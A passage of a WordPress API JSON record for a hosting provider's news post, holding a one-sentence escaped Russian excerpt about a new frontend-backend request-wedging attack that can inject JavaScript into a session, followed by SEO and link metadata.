\u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c\u044b\u0445 \u0432 \u0442\u043e\u043c \u0436\u0435 \u043f\u043e\u0442\u043e\u043a\u0435 \u043c\u0435\u0436\u0434\u0443 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434\u043e\u043c \u0438 \u0431\u044d\u043a\u0435\u043d\u0434\u043e\u043c. \u0410\u0442\u0430\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e JavaScript-\u043a\u043e\u0434\u0430 \u0432 \u0441\u0435\u0430\u043d\u0441 \u0441 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u043c","og:url":"https:\/\/prohoster.info\/de\/blog\/novosti-interneta\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2021-08-07T14:22:35+00:00","article:modified_time":"2026-02-09T15:18:09+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"100934","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-08-07 15:27:20","updated":"2026-02-09 15:18:09"},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/100934","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/comments?post=100934"}],"version-history":[{"count":2,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/100934\/revisions"}],"predecessor-version":[{"id":158412,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/100934\/revisions\/158412"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media\/100935"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media?parent=100934"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/categories?post=100934"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/tags?post=100934"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}